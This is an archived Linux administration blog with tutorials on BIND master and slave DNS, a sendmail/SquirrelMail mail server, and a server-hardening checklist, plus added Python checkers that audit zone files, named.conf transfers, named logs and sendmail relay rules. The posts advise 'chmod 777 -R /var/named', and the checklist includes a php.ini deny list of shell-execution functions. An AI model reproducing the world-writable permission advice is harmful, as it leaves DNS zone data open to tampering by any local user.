Archive for the ‘Linux Server’ Category

DNS: Linux Bind Installation

Posted: August 4, 2010 in DNS, LINUX

What is bind?

BIND is DNS server software that translates domain names into IP addresses. Because domain names are alphabetic, they are easier to remember, so when we browse the Internet we don't need to remember IP addresses. For example, the domain name http://www.yourdomain.com might translate to 192.168.0.1.

1. Check The BIND Package

[root@server named]# rpm -qa bind*

bind-libs-9.2.4-2
bind-utils-9.2.4-2
bind-9.2.4-2

2. Setting Computer NS1 With IP 192.168.0.1 As Nameserver And Domain Name yourdomain.com

[root@server ~]# cat /etc/resolv.conf

nameserver 192.168.0.1

3. Setting File /etc/named.conf

[root@server ~]# nano /etc/named.conf

//
// named.conf for Red Hat caching-nameserver
//
options {
   directory "/var/named";
   dump-file "/var/named/data/cache_dump.db";
   statistics-file "/var/named/data/named_stats.txt";
/*
 * If there is a firewall between you and nameservers you want
 * to talk to, you might need to uncomment the query-source
 * directive below.  Previous versions of BIND always asked
 * questions using port 53, but BIND 8.1 uses an unprivileged
 * port by default.
 */
 // query-source address * port 53;
};

//
// a caching only nameserver config
//
controls {
 inet 127.0.0.1 allow { localhost; } keys { rndckey; };
};

zone "localhost" IN {
   type master;
   file "localhost.zone";
   allow-update { none; };
};

zone "yourdomain.com" IN {
   type master;
   file "/var/named/yourdomain.com.zone";
   allow-update { none; };
};

zone "0.168.192.in-addr.arpa" IN {
   type master;
   file "/var/named/0.168.192.rev";
   allow-update { none; };
};

include "/etc/rndc.key";

4. Setting File /var/named/yourdomain.com.zone

First you must create the file yourdomain.com.zone; you can use this syntax:

[root@server ~]# nano /var/named/yourdomain.com.zone

$TTL    86400
@       IN SOA  yourdomain.com. root.yourdomain.com. (
                100     ; serial
                1H      ; refresh
                1M      ; retry
                1W      ; expiry
                1D )    ; minimum
@       IN NS   ns1.yourdomain.com.
@       IN A    192.168.0.1
ns1     IN A    192.168.0.1
@       IN MX   10 mail.yourdomain.com.
mail    IN A    192.168.0.1
www     IN A    192.168.0.1

5. Setting File /var/named/0.168.192.rev

First you must create the file 0.168.192.rev; you can use this syntax:

[root@server ~]# nano /var/named/0.168.192.rev

$TTL    86400
@       IN SOA  yourdomain.com. root.yourdomain.com. (
                100     ; serial
                1H      ; refresh
                1M      ; retry
                1W      ; expiry
                1D )    ; minimum

@       IN NS   ns1.yourdomain.com.
1       IN PTR  binggo.yourdomain.com.   ; trailing dot: otherwise the origin is appended
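A small zone-file checker, added here as an example (it is not from the post or from the BIND project), catches the mistake that bites most often when hand-editing zones: a name on the right-hand side of an NS, MX, CNAME or PTR record written without its trailing dot, which BIND treats as relative and silently extends with the origin. It also confirms that the SOA serial is numeric and that every in-zone NS name has an A record. The two zone texts are constructed to match the files above; the reverse zone's PTR target lacks its dot on purpose so the checker has something to report.

```python
# Constructed zone files modelled on the two in this post (forward and
# reverse). The PTR target below deliberately lacks its trailing dot so the
# checker has a defect to report.
FORWARD_ZONE = """\
$TTL 86400
@       IN SOA  yourdomain.com. root.yourdomain.com. (
                100     ; serial
                1H      ; refresh
                1M      ; retry
                1W      ; expiry
                1D )    ; minimum
@       IN NS   ns1.yourdomain.com.
@       IN A    192.168.0.1
ns1     IN A    192.168.0.1
@       IN MX   10 mail.yourdomain.com.
mail    IN A    192.168.0.1
www     IN A    192.168.0.1
"""

REVERSE_ZONE = """\
$TTL 86400
@       IN SOA  yourdomain.com. root.yourdomain.com. (
                100 1H 1M 1W 1D )
@       IN NS   ns1.yourdomain.com.
1       IN PTR  binggo.yourdomain.com
"""

# Record types whose last rdata field is a domain name and therefore gets the
# origin appended when written without a trailing dot.
NAME_TYPES = {"NS", "PTR", "CNAME", "MX"}


def logical_lines(text):
    """Yield one string per record, joining '( ... )' spans and dropping ';' comments."""
    buf, depth = [], 0
    for raw in text.splitlines():
        line = raw.split(";", 1)[0]
        depth += line.count("(") - line.count(")")
        buf.append(line.replace("(", " ").replace(")", " "))
        if depth <= 0:
            joined = " ".join(buf).rstrip()   # keep leading blanks: they mean "same owner"
            buf, depth = [], 0
            if joined.strip():
                yield joined


def parse_zone(text):
    """Return ($TTL value, [(owner, TYPE, rdata_tokens), ...])."""
    ttl, owner, records = None, "@", []
    for line in logical_lines(text):
        toks = line.split()
        if toks[0] == "$TTL":
            ttl = toks[1]
            continue
        if not line[0].isspace():          # an explicit owner starts the line
            owner, toks = toks[0], toks[1:]
        while toks and (toks[0].isdigit() or toks[0].upper() in ("IN", "CH", "HS")):
            toks.pop(0)                    # optional TTL and class
        records.append((owner, toks[0].upper(), toks[1:]))
    return ttl, records


def check_zone(text, origin):
    """Lint a zone file; returns a list of human-readable findings (empty = clean)."""
    findings = []
    ttl, records = parse_zone(text)
    if ttl is None:
        findings.append("no $TTL directive")
    soa = [r for r in records if r[1] == "SOA"]
    if len(soa) != 1:
        findings.append("zone must contain exactly one SOA record")
    else:
        mname, rname, serial = soa[0][2][:3]
        if not serial.isdigit():
            findings.append(f"SOA serial '{serial}' is not a number")
        for name in (mname, rname):
            if not name.endswith("."):
                findings.append(f"SOA name '{name}' lacks a trailing dot")
    for owner, rtype, rdata in records:
        target = rdata[-1] if rdata else ""
        # a multi-label name without a final dot is almost always a mistake
        if rtype in NAME_TYPES and "." in target and not target.endswith("."):
            findings.append(f"{rtype} target '{target}' lacks a trailing dot and will be "
                            f"read as '{target}.{origin}'")
    with_a = {owner for owner, rtype, _ in records if rtype == "A"}
    for owner, rtype, rdata in records:
        if rtype == "NS" and rdata and rdata[0].endswith("." + origin):
            label = rdata[0][: -len(origin) - 1]
            if label not in with_a:
                findings.append(f"NS {rdata[0]} has no A record in this zone")
    return findings


if __name__ == "__main__":
    for name, text in (("yourdomain.com.", FORWARD_ZONE),
                       ("0.168.192.in-addr.arpa.", REVERSE_ZONE)):
        print(name, check_zone(text, name) or "OK")
```

Run against the forward zone it reports nothing; against the reverse zone it reports that binggo.yourdomain.com would be served as binggo.yourdomain.com.0.168.192.in-addr.arpa. On a real server the same checks are what named-checkzone performs, so run that after every edit as well.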

6. nslookup yourdomain.com

[root@server ~]# nslookup yourdomain.com

Server:         192.168.0.1
Address:        192.168.0.1#53

Name:   yourdomain.com
Address: 192.168.0.1

7. dig yourdomain.com

[root@server ~]# dig yourdomain.com

8. Configuration For NS 1 Is Finished

If you see errors, you can try to change the permissions of the folder /var/named.

[root@server ~]# chmod 777 -Rvf /var/named/

mode of `/var/named/' changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.zero' changed to 0777 (rwxrwxrwx)
mode of `/var/named/localhost.zone' changed to 0777 (rwxrwxrwx)
mode of `/var/named/198.99.208.rev' changed to 0777 (rwxrwxrwx)
mode of `/var/named/data' changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.local' changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.ca' changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.ip6.local' changed to 0777 (rwxrwxrwx)
mode of `/var/named/localdomain.zone' changed to 0777 (rwxrwxrwx)
mode of `/var/named/yourdomain.com.zone' changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.broadcast' changed to 0777 (rwxrwxrwx)
mode of `/var/named/slaves' changed to 0777 (rwxrwxrwx)

9. Check The /var/log/messages Log To Find Out If There Are Errors

[root@server ~]# tail /var/log/messages

————————————————–

Document Source: http://www.howtoforge.com/bind-installation-on-centos

Installation Of BIND As A Secondary (Slave) DNS Server

After we have installed BIND as a master DNS server (NS1) (as explained in my recent post), we can now try to set up a secondary DNS server (NS2) with BIND on CentOS. NS2 acts as a backup if there are problems with NS1.

Make sure you’ve successfully set up NS1, as described in my previous post!

NS1 with IP 192.168.0.1
NS2 with IP 192.168.0.2
Our domain: yourdomain.com

Now we can try setting up NS2.

1. Check your BIND package

[root@server ~]# rpm -qa bind*

bind-libs-9.2.4-2
bind-utils-9.2.4-2
bind-9.2.4-2

2. Setting file /etc/resolv.conf

[root@server ~]# nano /etc/resolv.conf

nameserver 192.168.0.1

3. Setting file /etc/named.conf

[root@server ~]# nano /etc/named.conf

//
// named.conf for Red Hat caching-nameserver
//
options {
   directory "/var/named";
   dump-file "/var/named/data/cache_dump.db";
   statistics-file "/var/named/data/named_stats.txt";
/*
 * If there is a firewall between you and nameservers you want
 * to talk to, you might need to uncomment the query-source
 * directive below. Previous versions of BIND always asked
 * questions using port 53, but BIND 8.1 uses an unprivileged
 * port by default.
 */
 // query-source address * port 53;
   allow-transfer { 208.99.198.184/32; };
};

//
// a caching only nameserver config
//
controls {
 inet 127.0.0.1 allow { localhost; } keys { rndckey; };
};

zone "localhost" IN {
   type master;
   file "localhost.zone";
   allow-update { none; };
};

zone "yourdomain.com" IN {
   type slave;
   file "/var/named/yourdomain.com.zone";
   // allow-update { none; };
   allow-transfer { 192.168.0.1/32; };
   masters { 192.168.0.1; };
};

zone "0.168.192.in-addr.arpa" IN {
   type slave;
   file "/var/named/0.168.192.rev";
   // allow-update { none; };
   allow-transfer { 192.168.0.1/32; };
   masters { 192.168.0.1; };
};

include "/etc/rndc.key";
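An audit of named.conf, added as an example (not code from the post or from ISC): the master configuration in the first post never restricts zone transfers, so by default any host can AXFR yourdomain.com and the reverse zone, and neither configuration turns recursion off, which the hardening checklist further down this page calls "open DNS recursion". The parser below is a deliberately small one for BIND's statement/brace grammar; the sample configurations are a constructed copy of the post's master named.conf and a constructed hardened variant that allows transfers to NS2 (192.168.0.2) only.

```python
import re

# Constructed copy of the master named.conf from this post (comments kept so the
# tokenizer has something to strip) and a constructed hardened variant.
MASTER_CONF = """\
// named.conf for Red Hat caching-nameserver
options {
   directory "/var/named";
   /* BIND 8.1 uses an unprivileged port by default. */
   // query-source address * port 53;
};
controls {
 inet 127.0.0.1 allow { localhost; } keys { rndckey; };
};
zone "localhost" IN { type master; file "localhost.zone"; allow-update { none; }; };
zone "yourdomain.com" IN {
   type master;
   file "/var/named/yourdomain.com.zone";
   allow-update { none; };
};
zone "0.168.192.in-addr.arpa" IN {
   type master;
   file "/var/named/0.168.192.rev";
   allow-update { none; };
};
include "/etc/rndc.key";
"""

HARDENED_CONF = """\
options {
   directory "/var/named";
   recursion no;
   allow-transfer { 192.168.0.2; };
};
zone "yourdomain.com" IN { type master; file "yourdomain.com.zone"; allow-update { none; }; };
"""


def tokenize(text):
    """Strip /* */, // and # comments, then split into strings, braces, ';' and words."""
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    text = re.sub(r"(//|#).*", " ", text)          # '.' stops at end of line
    return re.findall(r'"[^"]*"|[{};]|[^\s{};"]+', text)


def parse(tokens):
    """Parse into statements (keyword, [args], body); body is a nested list or None."""
    stmts, i, n = [], 0, len(tokens)
    while i < n:
        args, body = [], None
        while i < n and tokens[i] not in ("{", ";"):
            args.append(tokens[i].strip('"'))
            i += 1
        if i < n and tokens[i] == "{":             # find the matching '}'
            depth, j = 1, i + 1
            while j < n and depth:
                depth += {"{": 1, "}": -1}.get(tokens[j], 0)
                j += 1
            body = parse(tokens[i + 1:j - 1])
            i = j
        if i < n and tokens[i] == ";":
            i += 1
        if args:
            stmts.append((args[0], args[1:], body))
    return stmts


def find(stmts, keyword):
    return [s for s in stmts if s[0] == keyword]


def audit(text):
    """Return findings about recursion, zone transfers and dynamic updates."""
    findings = []
    top = parse(tokenize(text))
    options = find(top, "options")
    options = options[0][2] if options else []
    recursion = find(options, "recursion")
    if not (recursion and recursion[0][1] == ["no"]) and not find(options, "allow-recursion"):
        findings.append("options: recursion is on for everyone (set 'recursion no' on an "
                        "authoritative server, or limit it with allow-recursion)")
    global_xfer = find(options, "allow-transfer")
    for _, args, body in find(top, "zone"):
        name, body = args[0], body or []
        ztype = find(body, "type")
        ztype = ztype[0][1][0] if ztype else ""
        if name == "localhost" or ztype == "hint":  # local convenience zones
            continue
        if ztype == "master":
            if not find(body, "allow-transfer") and not global_xfer:
                findings.append(f"zone {name}: no allow-transfer, so any host may AXFR the whole zone")
            upd = find(body, "allow-update")
            if not upd or [s[0] for s in (upd[0][2] or [])] != ["none"]:
                findings.append(f"zone {name}: allow-update should be {{ none; }}")
        elif ztype == "slave" and not find(body, "masters"):
            findings.append(f"zone {name}: slave zone without a masters list")
    return findings


if __name__ == "__main__":
    for label, conf in (("post's master config", MASTER_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit(conf) or "OK")
```

On the post's master configuration this reports three findings (recursion open, and no allow-transfer on either zone); the hardened variant passes. Two related points a practitioner will want to keep in mind: a global allow-transfer in options applies to every zone unless a zone overrides it, so the slave's 208.99.198.184/32 entry above governs the localhost zone too; and the permission fix the post reaches for (chmod 777 -R /var/named) makes the zone files writable by every local account, whereas giving them to the named user (chown -R named:named /var/named) is all the server needs.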

4. Change the permissions of the directory /var/named

[root@server ~]# chmod 777 -Rvf /var/named/

mode of `/var/named/' changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.zero' changed to 0777 (rwxrwxrwx)
mode of `/var/named/localhost.zone' changed to 0777 (rwxrwxrwx)
mode of `/var/named/data' changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.local' changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.ca' changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.ip6.local' changed to 0777 (rwxrwxrwx)
mode of `/var/named/localdomain.zone' changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.broadcast' changed to 0777 (rwxrwxrwx)
mode of `/var/named/slaves' changed to 0777 (rwxrwxrwx)

5. The files /var/named/yourdomain.com.zone and /var/named/0.168.192.rev are copied to NS2 automatically by zone transfer from NS1.

6. Running service named

[root@server ~]# service named restart

Stopping named: [ OK ]
Starting named: [ OK ]

7. Check the log file for errors

[root@server ~]# tail /var/log/messages

Aug 3 04:25:42 server named[9362]: listening on IPv4 interface venet0:0, 192.168.0.2#53
Aug 3 04:25:42 server named[9362]: command channel listening on 127.0.0.1#953
Aug 3 04:25:42 server named[9362]: zone localhost/IN: loaded serial 42
Aug 3 04:25:42 server named[9362]: running
Aug 3 04:25:42 server named[9362]: zone yourdomain.com/IN: transferred serial 100
Aug 3 04:25:42 server named[9362]: transfer of 'yourdomain.com/IN' from 192.168.0.1#53: end of transfer
Aug 3 04:25:42 server named[9362]: zone yourdomain.com/IN: sending notifies (serial 100)
Aug 3 04:25:43 server named[9362]: zone 0.168.192.in-addr.arpa/IN: transferred serial 100
Aug 3 04:25:43 server named[9362]: transfer of '0.168.192.in-addr.arpa/IN' from 192.168.0.1#53: end of transfer
Aug 3 04:25:43 server named[9362]: zone 0.168.192.in-addr.arpa/IN: sending notifies (serial 100)

Looking at this log, you can see that the yourdomain.com zone has been transferred: the zone data is copied to NS2, so if NS1 is dead or has a problem, NS2 holds a backup copy.
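Reading the log by eye works for two zones; the following added example (not part of the post) parses the same named log lines and checks that each expected zone was transferred from the intended master with the serial the master publishes (100 in the zone files above). The last log line is constructed to show what a refused transfer looks like, so the check has a failure to report as well.

```python
import re

# The named log lines from this post (quote characters normalised), plus one
# constructed final line in the form named uses when the master refuses an AXFR.
NAMED_LOG = """\
Aug 3 04:25:42 server named[9362]: listening on IPv4 interface venet0:0, 192.168.0.2#53
Aug 3 04:25:42 server named[9362]: command channel listening on 127.0.0.1#953
Aug 3 04:25:42 server named[9362]: zone localhost/IN: loaded serial 42
Aug 3 04:25:42 server named[9362]: running
Aug 3 04:25:42 server named[9362]: zone yourdomain.com/IN: transferred serial 100
Aug 3 04:25:42 server named[9362]: transfer of 'yourdomain.com/IN' from 192.168.0.1#53: end of transfer
Aug 3 04:25:42 server named[9362]: zone yourdomain.com/IN: sending notifies (serial 100)
Aug 3 04:25:43 server named[9362]: zone 0.168.192.in-addr.arpa/IN: transferred serial 100
Aug 3 04:25:43 server named[9362]: transfer of '0.168.192.in-addr.arpa/IN' from 192.168.0.1#53: end of transfer
Aug 3 04:25:43 server named[9362]: zone 0.168.192.in-addr.arpa/IN: sending notifies (serial 100)
Aug 3 04:26:10 server named[9362]: transfer of 'example.test/IN' from 192.168.0.1#53: failed while receiving responses: REFUSED
"""

TRANSFERRED = re.compile(r"zone (?P<zone>\S+)/IN: transferred serial (?P<serial>\d+)")
TRANSFER = re.compile(r"transfer of '(?P<zone>\S+)/IN' from (?P<src>[\d.]+)#\d+: (?P<result>.+)$")


def parse_named_log(text):
    """Collect per-zone transfer state: serial, source master, success flag, error text."""
    zones = {}
    for line in text.splitlines():
        m = TRANSFERRED.search(line)
        if m:
            zones.setdefault(m["zone"], {})["serial"] = int(m["serial"])
            continue
        m = TRANSFER.search(line)
        if m:
            z = zones.setdefault(m["zone"], {})
            z["source"] = m["src"]
            z["ok"] = m["result"] == "end of transfer"
            if not z["ok"]:
                z["error"] = m["result"]
    return zones


def check_replication(text, master, expected_serial, zone_names):
    """Problems: zone missing or failed, pulled from the wrong master, or stale serial."""
    zones, problems = parse_named_log(text), []
    for name in zone_names:
        z = zones.get(name, {})
        if not z.get("ok"):
            detail = f" ({z['error']})" if "error" in z else ""
            problems.append(f"{name}: not transferred{detail}")
            continue
        if z["source"] != master:
            problems.append(f"{name}: transferred from unexpected host {z['source']}")
        if z.get("serial") != expected_serial:
            problems.append(f"{name}: serial {z.get('serial')} differs from master serial {expected_serial}")
    return problems


if __name__ == "__main__":
    zones = ["yourdomain.com", "0.168.192.in-addr.arpa", "example.test"]
    for p in check_replication(NAMED_LOG, "192.168.0.1", 100, zones) or ["all zones replicated"]:
        print(p)
```

The "unexpected host" check is the one worth keeping in a monitoring job: a slave that starts pulling a zone from an address other than the configured master means named.conf on NS2 was changed, and that deserves a look.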

8. Result using nslookup

[root@server ~]# nslookup yourdomain.com

Server:         192.168.0.1
Address:        192.168.0.1#53

Name:   yourdomain.com
Address: 192.168.0.1

nslookup was answered by NS1 (192.168.0.1).

Now we can try to deactivate NS1 to see if name resolution is still working.

9. First add nameserver 192.168.0.2 to /etc/resolv.conf

[root@server ~]# cat /etc/resolv.conf

nameserver 192.168.0.1
nameserver 192.168.0.2

The domain is now served by NS2 whenever NS1 is not active. We don't need to change any files on NS2 because all zone files are transferred from NS1 to NS2.

10. Trying a DNS lookup while NS1 is down

[root@server ~]# nslookup yourdomain.com

Server:         192.168.0.2
Address:        192.168.0.2#53

Name:   yourdomain.com
Address: 192.168.0.1

Now if there’s any problem with NS1 you can rest calm because NS2 acts as a backup.

Document Source: http://www.howtoforge.com/installation-of-bind-as-a-secondary-slave-dns-server-on-centos


This tutorial explains how you can install and configure SquirrelMail on a RedHat/CentOS/Fedora based mail server which uses Sendmail and Apache.

Scenario:

Primary Mail Server: linuxbox4 (192.168.0.14)
Domain Name: abc.com
Trusted IP Pool: 192.168.0.0/24

Note: Replace domain name and system name and IP according to your scenario.

Prerequisites:

1. DNS is configured with a proper MX record.
2. All necessary packages are installed.

Step 1:

Configure all services to start at boot time.

chkconfig sendmail on
chkconfig httpd  on
chkconfig dovecot on

Step 2:

Configure /etc/hosts file. In this scenario /etc/hosts file should look like this:

192.168.0.14    linuxbox4   www.abc.com 


Step 3:
 
Outgoing Mail Server Configuration (Sendmail):
 
Open /etc/mail/sendmail.mc file and change the following two lines.
 
From:

DAEMON_OPTIONS(`Port=smtp,Addr=127.0.0.1, Name=MTA')dnl 
FEATURE(`accept_unresolvable_domains')dnl 


To: 

dnl DAEMON_OPTIONS(`Port=smtp,Addr=127.0.0.1, Name=MTA')dnl 
dnl FEATURE(`accept_unresolvable_domains')dnl 


Save and exit.
 
- Commenting out the first line makes sendmail accept incoming e-mail on all installed NICs instead of only on 127.0.0.1; otherwise the mail server would only be able to receive mail from itself.

- Commenting out the second line tells sendmail not to accept e-mail from mail servers whose PTR record is not configured in DNS. This is a basic level of spam control in sendmail.
 
Generate sendmail.cf file from sendmail.mc file.
 
m4 /etc/mail/sendmail.mc > /etc/mail/sendmail.cf
 
 

Step 4:

Allow RELAY for the trusted (organization's) IP addresses that you want to permit to send e-mail through this mail server. Open /etc/mail/access; in this file we specify all the addresses that will be sending e-mail through this server. At the end of the file add the following line:

192.168.0 RELAY

Save and exit, then convert this text database into DB format with the following command:

makemap hash /etc/mail/access.db < /etc/mail/access
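The access map matches IPv4 keys on octet boundaries, so "192.168.0" means 192.168.0.0/24, but a key such as "10" would open relaying to all of 10.0.0.0/8, which is an easy way to end up running an open relay. The following added example (not from the post or from the sendmail project) parses an access file and flags RELAY entries that reach beyond the scenario's trusted pool (192.168.0.0/24) or that grant relaying by hostname. The sample access file is constructed around the post's own entry.

```python
import ipaddress

# Constructed /etc/mail/access in the format this post uses: the post's own
# "192.168.0 RELA" line plus entries an auditor would want to see flagged.
ACCESS_FILE = """\
# trusted office LAN
192.168.0            RELAY
Connect:10.1.2.3     RELAY
10                   RELAY
partner.example      RELAY
spam.example         REJECT
From:bad@example     DISCARD
"""

TRUSTED_POOL = ipaddress.ip_network("192.168.0.0/24")   # the scenario's trusted IP pool


def prefix_to_network(key):
    """Sendmail matches IPv4 keys on octet boundaries: '192.168.0' is 192.168.0.0/24, '10' is /8."""
    parts = key.split(".")
    if not 1 <= len(parts) <= 4 or not all(p.isdigit() and int(p) < 256 for p in parts):
        return None                                    # not an address prefix (a hostname)
    addr = ".".join(parts + ["0"] * (4 - len(parts)))
    return ipaddress.ip_network(f"{addr}/{8 * len(parts)}")


def parse_access(text):
    """Yield (tag, key, action) from access-file lines, skipping comments and blanks."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, action = line.split(None, 1)
        tag = None
        if ":" in key and key.split(":", 1)[0] in ("Connect", "From", "To", "Spam"):
            tag, key = key.split(":", 1)
        yield tag, key, action.strip()


def audit_relay(text, trusted=TRUSTED_POOL):
    """Flag RELAY grants that reach beyond the trusted pool or rely on hostnames."""
    findings = []
    for tag, key, action in parse_access(text):
        if action.upper() != "RELAY" or tag not in (None, "Connect"):
            continue
        net = prefix_to_network(key)
        if net is None:
            findings.append(f"{key}: relaying granted by hostname rather than address; confirm it is intended")
        elif not net.subnet_of(trusted):
            findings.append(f"{key}: relaying for {net} reaches beyond trusted pool {trusted}")
    return findings


if __name__ == "__main__":
    for f in audit_relay(ACCESS_FILE) or ["no relay problems found"]:
        print(f)
```

The post's "192.168.0 RELAY" line passes; the three constructed entries are reported. Re-run the audit whenever the map is rebuilt with makemap, since the .db file is what sendmail actually consults.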
 
 

Step 5:

Tell sendmail that it will be acting as the primary mail server for the "abc.com" domain. We do this by adding the domain name to /etc/mail/local-host-names. If this server acts as a mail server for more than one domain, add the names of all the domains to this file, one per line. Open /etc/mail/local-host-names and add "abc.com" at the end of the file. Note: A mail server can act as the primary mail server for more than one domain at the same time, and can likewise act as both a primary and a secondary mail server for more than one domain at the same time.

Step 6:

All system users are mail users as well. Now create mail-only users:

useradd -s /usr/sbin/smrsh mailuser1
useradd -s /usr/sbin/smrsh mailuser2

Also set their passwords:

passwd mailuser1
passwd mailuser2

Step 7:

Finally restart the sendmail service.

service sendmail restart

Step 8:

Incoming Mail Server Configuration (Dovecot): Open /etc/dovecot.conf and change the following line.

From:

#protocols = imap  pop3

To:

protocols = imap imaps pop3 pop3s


Save and exit and restart dovecot service.
 
service dovecot restart
 
 
 
 

Step 9:

Webserver Configuration (Apache): Apache comes pre-configured; you just have to change the ServerName parameter in /etc/httpd/conf/httpd.conf and restart the service, that's all. Open /etc/httpd/conf/httpd.conf and set the ServerName parameter:

ServerName www.abc.com


Save and exit and restart httpd service.
 
service httpd restart
 
 

Installation & Configuration of SquirrelMail

- Check that SquirrelMail is installed on the system:

# rpm -q squirrelmail

- If SquirrelMail is not installed on the system, install it through rpm:

# rpm -ivh squirrelmail

- Now go to the SquirrelMail directory, located in /usr/share:

# cd /usr/share/squirrelmail

- Then go to the config directory:

# cd config

- Now run one of the following commands to configure SquirrelMail:

# ./conf.pl
OR
# perl conf.pl

- Now select option 1 (Organization Preferences):

Organization Name : YOUR_ORG_NAME
Organization Title : YOUR_ORG_NAME
Webmail Provider link : http://YOUR_ORG_SITE_ADDRESS
Provider name : YOUR_ORG_NAME

- Now select option 2 (Server Settings):

Domain : abc.com
Sendmail or SMTP : Sendmail
IMAP Server : localhost
IMAP Port : 143
Server software : uw
Delimiter : /

- Now select option 3 (Folder Settings):

Default Folder Prefix : mail/
Show Folder Prefix Option : true
Trash Folder : Trash
Sent Folder : Sent
Drafts Folder : Drafts
By default, move to trash : true
By default, move to sent : true
By default, save as draft : true
List Special Folders First : true
Show Special Folders Color : true
Auto Expunge : true
Default Sub. of INBOX : false
Show 'Contain Sub.' Option : true
Default Unseen Notify : 2
Default Unseen Type : 1
Auto Create Special Folders : true
Folder Delete Bypasses Trash : false
Enable /NoSelect folder fix : false

- Now select option 4 (General Settings):

Data Directory : /var/lib/squirrelmail/prefs/
Attachment Directory : /var/spool/squirrelmail/attach/
Directory Hash Level : 0
Default Left Size : 150
Usernames in Lowercase : false
Allow use of priority : true
Hide SM attributions : false
Allow use of receipts : true
Allow editing of identity : true
Allow editing of name : true
Remove username from header : false
Allow server thread sort : true
Allow server-side sorting : true
Allow server charset search : true
Enable UID support : true
PHP session name : SQMSESSID
Location base :

- Now choose option 8 (Plugins) and select the plugins that you wish to provide to your webmail users.

- Now open the browser with the following link:

http://YOUR_SITE_ADDRESS/webmail OR http://192.168.0.14/webmail

How to Secure a Linux Server.

1. Kernel recompile with grsecurity

2. firewall = CSF

3. Stop unnecessary processes

4. Install Logcheck

5. Install Logwatch

   Optimizing host.conf and sysctl.conf
   http://www.eth0.us/node/104

To configure Logwatch, SSH into the server and log in as root. At the command prompt type: pico -w /etc/log.d/conf/logwatch.conf

Scroll down to

MailTo = root

and change it to

MailTo = your@email.com

Note: Set the e-mail address to an offsite account in case you get hacked.

Now scroll down to

Detail = Low

and change that to Medium or High:

Detail = 5 or Detail = 10

Note: High gives you more detailed logs with all actions. Save and exit.

6. If cpanel server then WHM configuration check

7. OpenSSH configuration check

8. Switch from proftpd to pure-ftpd

9. Rootkit Hunter

rkhunter:


1. Login to your server via SSH as root. Then Type: cd /usr/local/src/

2. Download RKHunter Version 1.1.4

Type: wget http://downloads.rootkit.nl/rkhunter-1.1.4.tar.gz

3. Extract files

Type: tar -xzvf rkhunter-1.1.4.tar.gz

4. Type: cd rkhunter

5. Type: ./installer.sh

6. Let's set up RKHunter to e-mail you daily scan reports.

Type: pico -w /etc/cron.daily/rkhunter.sh

Add the following:

#!/bin/bash
(/usr/local/bin/rkhunter -c --cronjob 2>&1 | mail -s "RKhunter Scan Details" replace-this@with-your-email.com)

Replace the e-mail above with your e-mail!

It is best to send the e-mail to an off-site address, so that if the box IS compromised the hacker can't erase the scan report unless he hacks another server too.

Type: chmod +x /etc/cron.daily/rkhunter.sh

10. Chkrootkit

Installing chkrootkit


   [root@server ~]# wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
   [root@server ~]# tar xvfz chkrootkit.tar.gz
   [root@server ~]# ./chkrootkit*/chkrootkit

11. mod_security

12. mod_evasive

13. Host spoof protection

14. Operating System check

15. Name server configuration check

16. Disk check

17. Kernel check

18. Apache tune and check

19. MySQL tune and check

20. Enhanced log rotation

21. Day of the week backup rotations

22. Secure /tmp /var/tmp /dev/shm

23. Libsafe for 2.4 kernels

24. Exploit check

25. Delete unnecessary OS users

26. Disable open DNS recursion

27. Enhanced path protection

28. Remove SUID/GUID from binaries

29. PHP hardening

30. phpsuexec

31. Disable vulnerable phpBB installs

32. Initial cPanel configuration

33. Check iptables is configured

34. Check incoming MySQL port

35. Check /etc/cron.daily/logrotate

36. Check /etc/resolv.conf for localhost entry

37. Check /etc/named.conf for recursion restrictions

38. Check server runlevel

39. Check nobody cron

40. Check Operating System support

41. Check SSHv1 is disabled

42. Check SSH on non-standard port

43. Check SSH PasswordAuthentication

44. Check telnet port 23 is not in use

45. Check shell limits

46. Check Background Process Killer

47. Check root forwarder

48. Check exim for extended logging

49. Check php.ini for enable_dl = Off

50. Check php for disable_functions=

disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open, allow_url_fopen

51. Check php.ini for register_globals = Off

52. Check php open_basedir protection

53. Check phpsuexec

54. Check cPanel login is SSL only

55. Check boxtrapper is disabled

56. Check max emails per hour is set

57. Check whether users can reset passwords via email

58. Check whether native cPanel SSL is enabled

59. Check compilers

60. Check Anonymous FTP access

61. Check allow remote domains

62. Check block common domains

63. Check allow park domains

64. Check package updates

65. Check security updates

66. Check melange chat server

67. service cups stop; chkconfig cups off

68. service xfs stop; chkconfig xfs off

69. service atd stop; chkconfig atd off

70. service nfslock stop; chkconfig nfslock off

71. service canna stop; chkconfig canna off

72. service FreeWnn stop; chkconfig FreeWnn off

73. service cups-config-daemon stop; chkconfig cups-config-daemon off

74. service iiim stop; chkconfig iiim off

75. service mDNSResponder stop; chkconfig mDNSResponder off

76. service nifd stop; chkconfig nifd off

77. service rpcidmapd stop; chkconfig rpcidmapd off

78. service bluetooth stop; chkconfig bluetooth off

79. service anacron stop; chkconfig anacron off

80. service gpm stop; chkconfig gpm off

81. service saslauthd stop; chkconfig saslauthd off

82. service avahi-daemon stop; chkconfig avahi-daemon off

83. service avahi-dnsconfd stop; chkconfig avahi-dnsconfd off

84. service hidd stop; chkconfig hidd off

85. service pcscd stop; chkconfig pcscd off

86. service sbadm stop; chkconfig sbadm off

87. service webmin stop; chkconfig webmin off

88. Add Load Alert Scripts with 1 min cron

   #!/bin/bash
   # uptime alert script: mail when the 1-minute load average exceeds 4
   UP=$(uptime | awk '{print $(NF-2)}' | cut -d. -f1)
   if test "$UP" -gt 4
   then
       uptime | mail -s "**SERVER LOAD is $UP" mailadd@mail.com
   fi

89. ignore ping :

iptables -A INPUT -p icmp -j DROP

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

vi /etc/sysctl.conf

Append following line:

net.ipv4.icmp_echo_ignore_all = 1

